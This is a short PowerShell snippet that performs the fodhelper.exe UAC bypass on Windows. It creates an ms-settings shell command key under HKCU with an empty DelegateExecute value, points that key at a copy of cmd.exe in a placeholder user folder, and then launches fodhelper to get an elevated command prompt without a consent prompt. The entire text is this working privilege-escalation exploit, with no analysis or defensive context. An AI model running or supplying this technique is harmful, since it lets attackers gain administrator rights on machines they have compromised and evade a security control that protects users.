

    #Create registry structure

    New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
    New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
    Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\Users\YOURUSERHERE\not-existent-yet"
	copy C:\Windows\system32\cmd.exe C:\Users\YOURUSERHERE\not-existent-yet
	fodhelper.exe

----------------------------------------------------------------------------------------------------------------------------------------------------------------------
